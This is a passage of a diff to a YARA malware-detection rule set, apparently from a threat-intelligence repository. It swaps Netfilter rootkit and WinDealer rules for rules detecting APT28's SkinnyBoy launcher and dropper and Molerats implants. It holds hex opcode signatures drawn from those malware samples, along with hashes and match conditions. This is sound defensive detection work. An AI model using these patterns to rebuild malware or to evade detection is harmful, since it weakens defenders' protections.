-		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
-		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
-		$s1 = "%s\\netfilter.sys" fullword ascii
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
-		$s3 = "\\\\.\\netfilter" fullword ascii
+		$s1 = { 55 8b ec 81 ec 48 01 00 00 a1 00 00 01 10 33 c5 89 45 fc 53 56 57 6a 00 6a 00 6a 00 8b c2 6a 00 68 6c ef 00 10 89 85 d0 fe ff ff 89 8d cc fe ff ff 89 85 e4 fe ff ff c7 85 c0 fe ff ff 01 00 00 00 c7 85 d8 fe ff ff 00 00 00 00 c7 85 dc fe ff ff 00 00 00 00 ff 15 e4 b1 00 10 8b 1d a4 b0 00 10 8b f0 89 b5 d4 fe ff ff ff d3 8b 3d d4 b1 00 10 85 f6 74 26 6a 04 8d 85 ec fe ff ff 50 6a 06 56 c7 85 ec fe ff ff c0 27 09 00 ff d7 6a 04 8d 85 ec fe ff ff 50 6a 05 56 ff d7 ff d3 85 f6 74 22 6a 01 6a 00 6a 03 6a 00 6a 00 68 bb 01 00 00 ff b5 cc fe ff ff 56 ff 15 cc b1 00 10 89 85 d8 fe ff ff ff d3 8b 4d 08 8b 3d e8 b1 00 10 81 f9 00 00 a0 00 0f 83 a7 01 00 00 68 03 01 00 00 8d 85 f1 fe ff ff 6a 00 50 c6 85 f0 fe ff ff 00 e8 3c 33 00 00 83 c4 0c ba 01 00 00 00 6a 00 6a 01 8d 8d f0 fe ff ff e8 55 f7 ff ff 83 c4 08 8d 55 08 8d 8d e4 fe ff ff e8 94 f6 ff ff 8d bd f0 fe ff ff 8d 4f 01 8a 07 47 84 c0 75 f9 8b 75 08 2b f9 8d 04 37 50 6a 08 89 85 e0 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 57 8d 8d f0 fe ff ff 51 50 89 85 d0 fe ff ff e8 62 6e 00 00 8b 85 d0 fe ff ff 83 c4 0c 03 c7 56 8b b5 e4 fe ff ff 56 50 e8 49 6e 00 00 83 c4 0c 56 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 57 8d 85 f0 fe ff ff 6a 00 50 e8 96 32 00 00 83 c4 0c 8d 8d d4 fe ff ff 6a 01 ff b5 e0 fe ff ff ff b5 d0 fe ff ff e8 8a f3 ff ff 85 c0 0f 84 7c 03 00 00 8b 85 d4 fe ff ff 8b 3d e8 b1 00 10 85 c0 74 03 50 ff d7 8b 85 d8 fe ff ff 85 }
+		$s2 = { 33 d2 8b c1 b9 00 00 20 00 f7 f1 33 c9 89 8d e4 fe ff ff 3b ca 89 95 b8 fe ff ff 1b d2 f7 da 03 d0 89 95 c4 fe ff ff 0f 84 98 02 00 00 8b ff 8b b5 b8 fe ff ff 85 f6 74 09 8d 42 ff 8b fe 3b c8 74 05 bf 00 00 20 00 57 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b 8d e4 fe ff ff 0f af cf 03 8d d0 fe ff ff 57 8b f0 51 56 89 b5 ec fe ff ff e8 c9 6c 00 00 83 c4 0c 8d 85 f1 fe ff ff 68 03 01 00 00 6a 00 50 c6 85 f0 fe ff ff 00 e8 1c 31 00 00 8b 85 e4 fe ff ff 83 c4 0c 40 6a 00 ff b5 c4 fe ff ff 8b d0 8d 8d f0 fe ff ff 89 85 e4 fe ff ff e8 27 f5 ff ff 83 c4 08 8d 85 e0 fe ff ff 50 6a 00 6a 01 57 56 c7 85 e0 fe ff ff 00 00 00 00 ff 15 24 b0 00 10 85 c0 74 4c ff b5 e0 fe ff ff 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 8b f0 8d 85 e0 fe ff ff 50 56 6a 01 57 8b bd ec fe ff ff 57 ff 15 24 b0 00 10 57 6a 00 ff 15 b4 b0 00 10 50 a1 b8 b0 00 10 ff d0 8b bd e0 fe ff ff 89 b5 ec fe ff ff 8d b5 f0 fe ff ff 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 8d 04 3e 50 6a 08 89 85 c8 fe ff ff ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 56 8d 8d f0 fe ff ff 51 50 89 85 bc fe ff ff e8 d8 6b 00 00 8b 8d bc fe ff ff 83 c4 0c 03 ce 57 8b bd ec fe ff ff 57 51 e8 bf 6b 00 00 83 c4 0c 57 6a 00 ff 15 b4 b0 00 10 50 ff 15 b8 b0 00 10 56 8d 85 f0 fe ff ff 6a 00 50 e8 0d 30 00 00 8b b5 c0 fe ff ff 8b bd bc fe ff ff 83 c4 0c 8d 8d d4 fe ff ff 56 ff b5 c8 fe ff ff 57 e8 fb f0 ff ff 85 c0 0f 84 c9 00 00 00 85 f6 0f 84 c1 00 00 00 8b 85 d4 fe ff ff 8b 35 e8 b1 00 10 85 }
+		$s3 = { 55 8b ec 83 e4 f8 81 ec 34 02 00 00 a1 00 00 01 10 33 c4 89 84 24 30 02 00 00 53 56 57 6a ff ff 35 28 1b 01 10 ff 15 4c b0 00 10 ff 35 28 1b 01 10 ff 15 80 b0 00 10 8b 35 b8 b0 00 10 8b 3d b4 b0 00 10 8d 44 24 10 50 8d 54 24 10 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 e8 df 0a 00 00 8b 4c 24 14 83 c4 04 85 c9 0f 84 e6 02 00 00 8b 54 24 0c 33 c0 33 db c7 44 24 20 00 00 00 00 89 44 24 1c 85 c9 0f 84 c2 02 00 00 8d 64 24 00 8b 34 13 8d 04 13 56 6a 08 ff d7 50 ff 15 ec b0 00 10 8b c8 8b 44 24 0c 83 c0 04 56 03 c3 50 51 89 4c 24 24 e8 a7 7e 00 00 8b 44 24 18 03 c3 83 c4 0c 8b 44 06 04 50 6a 08 89 44 24 1c ff d7 50 ff 15 ec b0 00 10 ff 74 24 14 8b f8 8b 44 24 10 03 c3 83 c6 08 03 c6 50 57 e8 72 7e 00 00 83 c4 0c 68 04 01 00 00 6a 08 ff 15 b4 b0 00 10 50 ff 15 ec b0 00 10 68 00 00 00 f0 6a 18 6a 00 8b f0 6a 00 8d 44 24 34 50 c7 44 24 38 00 00 00 00 c7 44 24 3c 00 00 00 00 ff 15 18 b0 00 10 }
+		$s4 = { ff 15 a4 b0 00 10 8d 44 24 28 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 34 ff 15 14 b0 00 10 ff 15 a4 b0 00 10 6a 00 ff 74 24 18 57 ff 74 24 34 ff 15 0c b0 00 10 ff 15 a4 b0 00 10 6a 00 8d 44 24 30 50 56 6a 02 ff 74 24 38 c7 44 24 40 04 01 00 00 ff 15 10 b0 00 10 ff 74 24 28 ff 15 00 b0 00 10 6a 00 ff 74 24 28 ff 15 04 b0 00 10 8b 54 24 2c 8b 44 24 18 }
+		$s5 = { 50 68 04 01 00 00 ff 15 a8 b0 00 10 8d 44 24 30 50 ff 15 a0 b1 00 10 68 18 ee 00 10 8d 44 24 34 50 ff 15 9c b0 00 10 b8 4d 5a 00 00 66 39 07 0f 85 b2 00 00 00 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 68 00 00 00 40 8d 44 24 48 50 ff 15 40 b0 00 10 8b f0 ff 15 a4 b0 00 10 83 fe }
+		$s6 = { 6a 00 8d 44 24 28 50 ff 74 24 1c c7 44 24 30 00 00 00 00 57 56 ff 15 38 b0 00 10 56 ff 15 44 b0 00 10 68 80 00 00 00 8d 44 24 34 50 ff 15 48 b0 00 10 8d 44 24 30 50 ff 15 a4 b1 00 10 85 c0 74 2d 8d 44 24 30 50 ff 15 b0 b0 00 10 8b f0 6a 01 56 ff 15 a0 b0 00 10 8d 4c 24 20 51 a3 20 1b 01 10 ff d0 56 89 44 24 20 ff 15 f4 b0 00 10 e8 ad f3 ff ff 57 8b 3d b4 b0 00 10 6a 00 ff d7 8b 35 b8 b0 00 10 50 ff d6 ff 74 24 18 6a 00 ff d7 50 ff d6 8b 44 24 1c 85 c0 74 12 8b 54 24 20 50 b9 4c ef 00 10 e8 77 0c 00 00 83 c4 04 8b 54 24 0c 8b 0c 13 8d 04 13 8d 04 19 83 c3 08 8b 44 10 04 03 c1 03 d8 3b 5c 24 10 0f 82 42 fd ff ff 52 6a 00 ff d7 50 ff d6 68 00 dd 6d 00 ff 35 28 1b 01 10 ff 15 4c b0 00 10 85 c0 0f 85 d4 fc ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( all of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Netfilter_May_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Launcher_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Netfilter rootkit"
+		description = "Detect the Launcher of SkinnyBoy"
 		author = "Arkbird_SOLG"
-		id = "da333ed8-8cd3-5ae4-bce5-a43a227fdee3"
-		date = "2021-06-18"
-		modified = "2021-06-21"
-		reference = "https://twitter.com/struppigel/status/1405483373280235520"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_May_2021_1.yara#L1-L22"
+		id = "4e69cba4-92ef-5ea5-95d8-b22ed77f515c"
+		date = "2021-06-05"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Launcher_Jun_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "f219981af907f74e4d95f768d99b7fd877c8bfb00587d198a4b0e2c521c744e1"
+		logic_hash = "4d5906832a1bc90552255ada1cc9e3c7cd3e14e4b0cb11b1bf2c11c57bca8ad8"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "2a652721243f29e82bdf57b565208c59937bbb6af4ab51e7b6ba7ed270ea6bce"
+		tlp = "White"
+		adversary = "APT28"
+
+	strings:
+		$s1 = { 55 8b ec 83 e4 f8 81 ec bc 06 00 00 a1 00 e0 40 00 33 c4 89 84 24 b8 06 00 00 53 56 57 33 c0 68 06 02 00 00 50 66 89 84 24 b8 02 00 00 8d 84 24 ba 02 00 00 50 8b f1 e8 64 31 00 00 8b 1d 28 90 40 00 0f 57 c0 83 c4 0c 8d 84 24 9c 02 00 00 50 c7 84 24 a0 02 00 00 79 00 00 00 66 0f d6 84 24 a4 02 00 00 66 0f d6 84 24 ac 02 00 00 c7 84 24 78 02 00 00 57 00 00 00 66 0f d6 84 24 7c 02 00 00 66 0f d6 84 24 84 02 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 85 d2 74 1b 8d 9b 00 00 00 00 66 8b 84 4c 74 02 00 00 66 31 84 4c 9c 02 00 00 41 3b ca 72 eb a1 80 cd 40 00 89 84 24 88 02 00 00 0f b7 05 84 cd 40 00 66 89 84 24 8c 02 00 00 a1 88 cd 40 00 89 84 24 74 02 00 00 0f b7 05 8c cd 40 00 66 89 84 24 78 02 00 00 0f 57 c0 8d 84 24 88 02 00 00 50 66 0f d6 84 24 92 02 00 00 c7 84 24 9a 02 00 00 00 00 00 00 66 c7 84 24 9e 02 00 00 00 00 66 0f d6 84 24 7e 02 00 00 c7 84 24 86 02 00 00 00 00 00 00 66 c7 84 24 8a 02 00 00 00 00 ff d3 8b d0 33 c9 89 15 38 fb 40 00 }
+		$s2 = { 66 8b 84 4c 74 02 00 00 66 31 84 4c 88 02 00 00 41 3b ca 72 eb 6a 64 6a 08 ff 15 30 90 40 00 50 ff 15 34 90 40 00 8b 1d 3c 90 40 00 89 44 24 0c 56 8d 84 24 b4 02 00 00 50 ff d3 8b 3d 44 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 68 90 cd 40 00 8d 84 24 b4 02 00 00 50 ff d3 8d 44 24 20 50 8d 84 24 b4 02 00 00 50 ff 15 40 90 40 00 8b f0 8d 84 24 b0 02 00 00 50 89 74 24 14 ff 15 40 91 40 00 8d 84 24 b0 02 00 00 50 ff d7 83 fe ff 0f 84 21 02 00 00 8b 35 2c 90 40 00 8d 9b 00 00 00 00 8d 84 24 9c 02 00 00 50 8d 44 24 50 50 ff d6 85 }
+		$s3 = { ff 15 20 90 40 00 8d 44 24 14 50 6a 00 6a 00 68 0c 80 00 00 ff 74 24 28 ff 15 04 90 40 00 ff 15 20 90 40 00 6a 00 56 8d 44 24 54 50 ff 74 24 20 ff 15 14 90 40 00 ff 15 20 90 40 00 6a 00 8d 44 24 20 50 ff 74 24 14 c7 44 24 28 64 00 00 00 6a 02 ff 74 24 24 ff 15 10 90 40 00 ff 74 24 14 ff 15 00 90 40 00 6a 00 ff 74 24 1c ff 15 0c 90 40 00 8b 74 24 1c 8b 4c 24 0c ba 90 ed 40 00 83 ee }
+		$s4 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
+		$s5 = { 55 8b ec 81 ec 6c 04 00 00 a1 00 e0 40 00 33 c5 89 45 fc 56 33 c0 68 06 02 00 00 50 66 89 85 f0 fb ff ff 8d 85 f2 fb ff ff 50 8b f1 e8 8f 33 00 00 68 04 01 00 00 8d 85 f0 fb ff ff 6a 00 50 e8 7c 33 00 00 83 c4 18 56 ff 15 48 91 40 00 85 c0 0f 84 b6 01 00 00 b8 69 00 00 00 68 d2 00 00 00 66 89 85 24 ff ff ff 8d 85 26 ff ff ff 6a 00 50 c7 85 f8 fe ff ff 1f 00 16 00 c7 85 fc fe ff ff 0b 00 22 00 c7 85 00 ff ff ff 78 00 7c 00 c7 85 04 ff ff ff 00 00 55 00 c7 85 08 ff ff ff 5b 00 2e 00 c7 85 0c ff ff ff 3f 00 03 00 c7 85 10 ff ff ff 04 00 04 00 c7 85 14 ff ff ff 0d 00 15 00 c7 85 18 ff ff ff 47 00 44 00 c7 85 1c ff ff ff 47 00 14 00 c7 85 20 ff ff ff 09 00 68 00 e8 dd 32 00 00 f3 0f 7e 05 48 cd 40 00 66 0f d6 85 f8 fd ff ff f3 0f 7e 05 50 cd 40 00 66 0f d6 85 00 fe ff ff f3 0f 7e 05 58 cd 40 00 66 0f d6 85 08 fe ff ff f3 0f 7e 05 60 cd 40 00 66 0f d6 85 10 fe ff ff f3 0f 7e 05 68 cd 40 00 68 d0 00 00 00 66 0f d6 85 18 fe ff ff f3 0f 7e 05 70 cd 40 00 8d 85 28 fe ff ff 6a 00 50 66 0f d6 85 20 fe ff ff e8 6a 32 00 00 83 c4 18 33 }
+		$s6 = { 0f b7 8c 05 f8 fd ff ff 66 31 8c 05 f8 fe ff ff 0f b7 8c 05 fa fd ff ff 66 31 8c 05 fa fe ff ff 0f b7 8c 05 fc fd ff ff 66 31 8c 05 fc fe ff ff 0f b7 8c 05 fe fd ff ff 66 31 8c 05 fe fe ff ff 83 c0 08 3d 00 01 00 00 72 b6 56 8d 85 f8 fe ff ff 50 8d 85 f0 fb ff ff 68 08 02 00 00 50 e8 ed 04 00 00 6a 44 8d 85 98 fb ff ff 6a 00 50 e8 ed 31 00 00 83 c4 1c 8d 85 e0 fb ff ff 50 8d 85 98 fb ff ff 50 6a 00 6a 00 68 00 00 00 08 6a 00 6a 00 6a 00 8d 85 f0 fb ff ff 50 6a 00 c7 85 98 fb ff ff 44 00 00 00 ff 15 38 90 40 00 8b 4d fc 33 cd 5e e8 b9 04 00 00 8b e5 }
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
+}
+rule ARKBIRD_SOLG_MAL_Skinnyboy_Dropper_Jun_2021_1 : FILE
+{
+	meta:
+		description = "Detect SkinnyBoy Dropper"
+		author = "Arkbird_SOLG"
+		id = "1ea4cfe7-d44d-5cdb-8436-cb2b09dd2e56"
+		date = "2021-05-01"
+		modified = "2021-06-06"
+		reference = "https://cluster25.io/wp-content/uploads/2021/05/2021-05_FancyBear.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-06/APT28/MAL_SkinnyBoy_Dropper_Jun_2021_1.yara#L1-L19"
+		license_url = "N/A"
+		logic_hash = "805bc5bb5833a75d68df2a6ce828d70b2257809a3699fdca5e621aae6bdc5070"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		hash1 = "63d61549030fcf46ff1dc138122580b4364f0fe99e6b068bc6a3d6903656aff0"
-		hash2 = "8249e9c0ac0840a36d9a5b9ff3e217198a2f533159acd4bf3d9b0132cc079870"
-		hash3 = "d64f906376f21677d0585e93dae8b36248f94be7091b01fd1d4381916a326afe"
+		hash1 = "12331809c3e03d84498f428a37a28cf6cbb1dafe98c36463593ad12898c588c9"
 		tlp = "White"
-		adversary = "Chinese APT Group"
+		adversary = "APT28"
 
 	strings:
-		$seq1 = { 48 8b 05 a9 57 ff ff 45 33 c9 49 b8 32 a2 df 2d 99 2b 00 00 48 85 c0 74 05 49 3b c0 75 38 0f 31 48 c1 e2 20 48 8d 0d 85 57 ff ff 48 0b c2 48 33 c1 48 89 05 78 57 ff ff 66 44 89 0d 76 57 ff ff 48 8b 05 69 57 ff ff 48 85 c0 75 0a 49 8b c0 48 89 05 5a 57 ff ff 48 f7 d0 48 89 05 58 57 }
-		$seq2 = { 48 83 ec 38 48 83 64 24 20 00 48 8d 05 83 4c 00 00 48 8d 15 24 d1 00 00 48 89 44 24 28 48 8d 4c 24 20 e8 4d 05 00 00 85 c0 78 16 4c 8d 05 22 d1 00 00 83 ca ff 48 8d 0d 00 d1 00 00 e8 39 05 00 00 48 83 c4 }
-		$seq3 = { 45 33 c0 48 8d 4c 24 40 41 8d 50 01 ff 15 5d 62 00 00 c6 84 24 88 00 00 00 01 48 8d 84 24 88 00 00 00 48 89 46 18 48 8d 0d e2 fe ff ff 48 89 9e c0 00 00 00 48 8d 44 24 40 48 89 46 50 48 8d 44 24 30 48 89 46 48 65 48 8b 04 25 88 01 00 00 48 89 86 98 00 00 00 48 8b 86 b8 00 00 00 40 88 7e 40 c6 40 b8 06 4c 89 78 e0 48 89 58 e8 c7 40 c0 01 00 00 00 c7 40 c8 0d 00 00 00 48 89 58 d0 48 8b 86 b8 00 00 00 48 89 48 f0 48 8d 4c 24 40 48 89 48 f8 c6 40 bb e0 48 8b 43 28 48 85 c0 74 2f 48 8b 48 10 48 85 c9 74 07 48 21 78 10 4c 8b f1 48 8b 08 48 85 c9 74 06 48 21 38 48 8b e9 48 8b 48 08 48 85 c9 74 08 48 83 60 08 00 48 8b f9 48 8b d6 49 8b cf ff 15 74 61 00 00 3d 03 01 00 00 75 19 48 83 64 24 20 00 48 8d 4c 24 40 41 b1 01 45 33 c0 33 d2 ff 15 64 61 00 00 48 8b 43 28 48 85 c0 74 1a 4d }
-		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
-		$s1 = "%sc=%s" fullword ascii
-		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
-		$s3 = "NETIO.SYS" fullword ascii
+		$s1 = { 55 8b ec b8 48 12 00 00 e8 a3 52 00 00 a1 00 d0 40 00 33 c5 89 45 fc 56 57 68 08 02 00 00 8d 85 cc ed ff ff 50 51 ff 15 2c 80 40 00 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 8d 85 cc ed ff ff 50 c7 85 b8 ed ff ff 00 00 00 00 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 12 6a 00 56 ff 15 58 80 40 00 56 8b f8 ff 15 20 80 40 00 8d 85 c8 ed ff ff 50 8d 95 b8 ed ff ff 8d 8d cc ed ff ff 89 bd c8 ed ff ff e8 bc fd ff ff 8b bd b8 ed ff ff b8 4d 5a 00 00 83 c4 04 66 39 07 74 1b 68 c1 00 00 00 ff 15 34 80 40 00 5f 5e 8b 4d fc 33 cd e8 fe 08 00 00 8b e5 }
+		$s2 = { 8b 47 3c 81 3c 07 50 45 00 00 75 d9 8b 47 1c 8b b5 c8 ed ff ff 8b 4f 20 2b f0 85 c9 74 04 8b f1 2b f0 53 56 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 8b 4f 1c 56 03 cf 8b d8 51 53 89 9d c4 ed ff ff e8 96 5d 00 00 68 08 02 00 00 8d 85 f4 f9 ff ff 6a 00 50 e8 33 25 00 00 83 c4 18 8d 85 f4 f9 ff ff 50 6a 00 6a 00 68 1c 80 00 00 6a 00 ff 15 30 81 40 00 b8 18 00 00 00 68 ee 00 00 00 66 89 85 0c fc ff ff 8d 85 0e fc ff ff 6a 00 50 c7 85 fc fb ff ff 00 00 3f 00 c7 85 00 fc ff ff 47 00 5b 00 c7 85 04 fc ff ff 09 00 19 00 c7 85 08 fc ff ff 08 00 0d 00 e8 d1 24 00 00 f3 0f 7e 05 c4 bd 40 00 a1 d4 bd 40 00 68 ec 00 00 00 89 85 0c ff ff ff 66 0f d6 85 fc fe ff ff f3 0f 7e 05 cc bd 40 00 8d 85 10 ff ff ff 6a 00 50 66 0f d6 85 04 ff ff ff e8 93 24 00 00 83 c4 18 33 }
+		$s3 = { 0f b7 8c 05 fc fe ff ff 66 31 8c 05 fc fb ff ff 0f b7 8c 05 fe fe ff ff 66 31 8c 05 fe fb ff ff 0f b7 8c 05 00 ff ff ff 66 31 8c 05 00 fc ff ff 0f b7 8c 05 02 ff ff ff 66 31 8c 05 02 fc ff ff 83 c0 08 3d 00 01 00 00 72 b6 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fb ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 8d 85 f4 f9 ff ff 50 ff 15 28 80 40 00 68 d8 00 00 00 8d 85 24 fe ff ff 6a 00 50 c7 85 fc fd ff ff 1f 00 33 00 c7 85 00 fe ff ff 58 00 4e 00 c7 85 04 fe ff ff 5d 00 1b 00 c7 85 08 fe ff ff 59 00 27 00 c7 85 0c fe ff ff 70 00 2d 00 c7 85 10 fe ff ff 16 00 13 00 c7 85 14 fe ff ff 03 00 1c 00 c7 85 18 fe ff ff 0d 00 2a 00 c7 85 1c fe ff ff 07 00 51 00 c7 85 20 fe ff ff 08 00 13 00 e8 8f 23 00 00 f3 0f 7e 05 d8 bd 40 00 66 a1 00 be 40 00 66 0f d6 85 fc fe ff ff f3 0f 7e 05 e0 bd 40 00 66 0f d6 85 04 ff ff ff f3 0f 7e 05 e8 bd 40 00 66 0f d6 85 0c ff ff ff f3 0f 7e 05 f0 bd 40 00 68 d6 00 00 00 66 89 85 24 ff ff ff 66 0f d6 85 14 ff ff ff f3 0f 7e 05 f8 bd 40 00 8d 85 26 ff ff ff 6a 00 50 66 0f d6 85 1c ff ff ff e8 1f 23 00 00 83 c4 18 33 }
+		$s4 = { 0f b7 84 0d fc fe ff ff 66 31 84 0d fc fc ff ff 0f b7 84 0d fe fe ff ff 66 31 84 0d fe fc ff ff 0f b7 84 0d 00 ff ff ff 66 31 84 0d 00 fd ff ff 0f b7 84 0d 02 ff ff ff 66 31 84 0d 02 fd ff ff 83 c1 08 81 f9 00 01 00 00 72 b5 8d 85 f4 f9 ff ff 50 ff 15 38 81 40 00 8d 85 fc fc ff ff 50 8d 85 f4 f9 ff ff 50 ff 15 40 80 40 00 6a 00 6a 00 8d 85 c0 ed ff ff 50 6a 00 6a 01 56 53 8b 1d 00 80 40 00 c7 85 c0 ed ff ff 00 00 00 00 ff d3 ff b5 c0 ed ff ff 6a 08 ff 15 0c 80 40 00 50 ff 15 08 80 40 00 6a 00 6a 00 8d 8d c0 ed ff ff 51 50 6a 01 56 ff b5 c4 ed ff ff 89 85 bc ed ff ff ff d3 8b 85 c0 ed ff ff 6a 00 68 80 00 00 00 6a 04 6a 00 6a 02 89 85 b8 ed ff ff 68 00 00 00 40 8d 85 f4 f9 ff ff 50 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b 1d 38 80 40 00 83 fe ff 74 55 3d b7 00 00 00 75 0b 6a 00 6a 00 6a 00 56 ff }
+		$s5 = { 55 8b ec 83 ec 0c a1 00 d0 40 00 33 c5 89 45 fc 53 8b 5d 08 56 57 6a 00 68 80 00 00 00 6a 03 6a 00 6a 01 68 00 00 00 80 51 89 55 f4 ff 15 18 80 40 00 8b f0 ff 15 1c 80 40 00 8b f8 83 fe ff 74 67 83 ff 02 74 62 6a 00 56 ff 15 58 80 40 00 89 03 85 c0 74 47 c7 45 f8 00 00 00 00 ff 15 0c 80 40 00 ff 33 6a 08 50 ff 15 08 80 40 00 8b 4d f4 6a 00 89 01 8d 4d f8 51 ff 33 50 56 ff 15 14 80 40 00 56 ff 15 20 80 40 00 8b c7 5f 5e 5b 8b 4d fc 33 cd e8 d4 0a 00 00 8b e5 }
+		$s6 = { 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE
+rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect modules from WinDealer implant"
+		description = "Detect Molerats implants"
 		author = "Arkbird_SOLG"
-		id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9"
-		date = "2021-10-30"
-		modified = "2021-10-31"
-		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
